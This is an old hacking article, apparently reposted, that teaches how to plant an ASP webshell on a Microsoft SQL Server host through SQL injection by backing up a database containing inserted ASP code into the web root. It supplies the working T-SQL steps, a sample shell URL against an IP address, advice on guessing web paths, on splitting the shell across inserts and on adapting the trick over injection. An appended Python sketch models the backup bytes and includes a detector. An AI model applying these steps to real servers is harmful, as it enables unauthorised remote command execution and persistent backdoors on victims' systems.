
Getting an ASP shell with BACKUP

2004-11-16 19:47
This article is about getting a webshell through SQL injection against an MSSQL database. The method has worked reliably since the day I found it (July 2003). You do not need the sa privilege; being the owner of a database (dbo) is enough.

Open Query Analyzer. The following steps generate a strange but usable webshell (assume the web root is g:/wwwtest and the database model is intact, i.e. unchanged since installation, so its backup is small). The ASP code that belongs inside the quotes of the INSERT did not survive being pasted as HTML (its <% %> tags were stripped), so only the empty string remains here:

use model;
create table cmd (str image);
insert into cmd(str) values ('');
backup database model to disk='g:/wwwtest/l.asp';

Click Run and the model database is backed up into the web publishing directory. Download it? No: request the file from the web server and you have your shell...

http://202.119.9.42/l.asp?c=dir

Here is the explanation. The ASP (VBScript) interpreter executes only the text between <% and %>; everything else in the file is sent to the client as literal page content. So naming the backup file .asp and requesting it does not cause a 500 error as long as the file contains no stray <% ... %> pair. By default the database stores its strings in a "loose" way: catalog names are nvarchar, two bytes per character, so the stored string "Time" shows up in the backup file as "T i m e" (a NUL byte after every character). That makes it very unlikely that the byte pair <% appears in the backup by accident. These are the two preconditions.

But how do we turn it into a webshell? The storage of image (and binary) columns is different: what we insert appears in the backup file in exactly the form we wrote it. Data inserted into a column of type image is NOT written to the backup in the "loose" two-byte form but as the original bytes. So once we create a table with an image column and insert some evil code, we can back up a shell!

Er, there are also some cons:

1) The output directory must be the physical web directory. Usually we can only guess it. On a virtual host, perhaps the path can be revealed through another site on the same server or in some other way.
2) The database user must have the BACKUP privilege. Some odd webmasters grant only SELECT and INSERT; if you meet such a webmaster, abandon this method.

And the pros:

1) It gives you a webshell as soon as you have the backup privilege, and a database owner has it!
2) It gives a new way of planting a backdoor. Suppose your database is Access and you named it .asp to stop people from downloading it. It COULD be a webshell ;)

Oh, I nearly forgot the most important thing: data written by different INSERT statements is NOT contiguous in the backup file. That means that if your webshell code is too long, you must split it across several INSERTs so that each row is a self-contained fragment (a complete <% ... %> block or a piece of plain HTML), like this:

========= CUT ME HERE ======================================================
use model
create table cmd (str image);
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('" method="POST">');
insert into cmd(str) values ('

');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
insert into cmd(str) values ('');
backup database model to disk='c:/l.asp';
========= CUT ME HERE ======================================================

(As above, the ASP code inside the quotes was stripped when the article was rendered as HTML; only the structure of the split survives.)

To those who did not successfully get the shell: make sure your test database (e.g. model) is INTACT.

To those who work over the web (injecting instead of sitting at Query Analyzer): declare @a sysname; select @a=db_name() gives you the name of the database you are already in, so you can back up that one instead of model.

To those who thought it was too simple: try the same trick with BACKUP LOG, or think about how to reach every file in a similar way ;)

Greets: All SST Members. Yang Shuo, my girlfriend.

Editor's note: this article was posted with a rough Chinese translation for readers whose English is weak. The original is "Backup a shell", From: SST (www.0x557.org), Author: Swan (Swan[at]0x557[dot]org), which 辣m found on a foreign site.
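As an added illustration that is not part of Swan's article or of this page, the Python below models the two storage behaviours the explanation relies on and the "not contiguous" warning behind the split INSERTs: strings stored as nvarchar (UTF-16LE, the "loose" form) never contain the byte pair <%, image rows are copied verbatim, and rows from separate INSERTs end up separated by other page data. The byte layout is a deliberate simplification (a constructed filler stands in for real page headers, and the sample rows are constructed too); the one real-format detail used is that SQL Server backups are Microsoft Tape Format files whose first block begins with the ASCII bytes TAPE, which a defender can use to spot a backup parked under a web root with a script extension.

```python
"""Model of why BACKUP DATABASE can yield a working ASP page.

Constructed example, not code from Swan's article: it builds a byte
buffer laid out the way the article describes a SQL Server backup, then
extracts the fragments an ASP interpreter would treat as code.
"""
import re

# SQL Server backups are written in Microsoft Tape Format; the first
# descriptor block starts with the ASCII bytes "TAPE".
MTF_MAGIC = b"TAPE"

# ASP executes only the text between these delimiters; everything else
# in the file is sent to the client as literal page content.
ASP_BLOCK = re.compile(rb"<%.*?%>", re.DOTALL)


def nvarchar_bytes(text: str) -> bytes:
    """Bytes of an nvarchar value as stored on a page: UTF-16LE.

    This is the "loose" form from the article: "Time" becomes
    T NUL i NUL m NUL e NUL. The NUL after '<' means the byte pair
    '<%' can never occur inside such a string.
    """
    return text.encode("utf-16-le")


def image_bytes(data: bytes) -> bytes:
    """Bytes of an image value: stored verbatim, no re-encoding."""
    return bytes(data)


def build_fake_backup(rows, junk=b"\x00\x7f\x81JUNK\xfe"):
    """Assemble a constructed backup image: magic, then rows separated
    by filler bytes standing in for page headers and other data.
    Rows from separate INSERTs are deliberately non-adjacent, matching
    the article's warning that they are not contiguous."""
    out = bytearray(MTF_MAGIC)
    for row in rows:
        out += junk
        out += row
    out += junk
    return bytes(out)


def asp_fragments(backup: bytes):
    """Return the byte spans an ASP interpreter would try to execute."""
    return ASP_BLOCK.findall(backup)


def self_contained(row: bytes) -> bool:
    """True if a row can stand alone in the backup: every block it
    opens it also closes, so filler between rows never lands inside
    <% ... %>. Use this on each INSERT value when splitting a shell."""
    rest = ASP_BLOCK.sub(b"", row)
    return b"<%" not in rest and b"%>" not in rest


def is_mtf(backup: bytes) -> bool:
    return backup.startswith(MTF_MAGIC)


def webroot_backup_risk(backup: bytes):
    """Defender's check for a file found under a web root with a script
    extension: is it a SQL Server backup, and does it carry ASP code?"""
    frags = asp_fragments(backup)
    return {"is_mtf": is_mtf(backup), "asp_fragments": len(frags),
            "fragments": frags}


# Constructed sample rows:
# 1) a catalog string: "<%" disappears into "<" NUL "%" NUL
LOOSE = nvarchar_bytes("<%Time%>")
# 2) one image row holding a complete ASP block
RAW_OK = image_bytes(b'<%Response.Write(Request("c"))%>')
# 3) one ASP block split over two INSERTs: filler will land inside it
RAW_SPLIT_A = image_bytes(b"<%Response.Wri")
RAW_SPLIT_B = image_bytes(b'te("x")%>')


def demo():
    """Fragments seen by ASP for a well-split and a badly-split shell."""
    good = build_fake_backup([LOOSE, RAW_OK])
    bad = build_fake_backup([LOOSE, RAW_SPLIT_A, RAW_SPLIT_B])
    return asp_fragments(good), asp_fragments(bad)


if __name__ == "__main__":
    good, bad = demo()
    print("well-split :", good)
    print("badly-split:", bad)
    print("self-contained rows:",
          [self_contained(r) for r in (RAW_OK, RAW_SPLIT_A, RAW_SPLIT_B)])
```

Running demo() returns the intact image row as one clean ASP block, while the block split over two rows comes back with the filler bytes inside it, which is the page an ASP interpreter would choke on; that is why every INSERT in the article carries a self-contained fragment, and self_contained() is the check to run on each value before inserting it. On the defensive side, webroot_backup_risk() over a file found in a web root flags both the TAPE header and any embedded <% ... %> blocks.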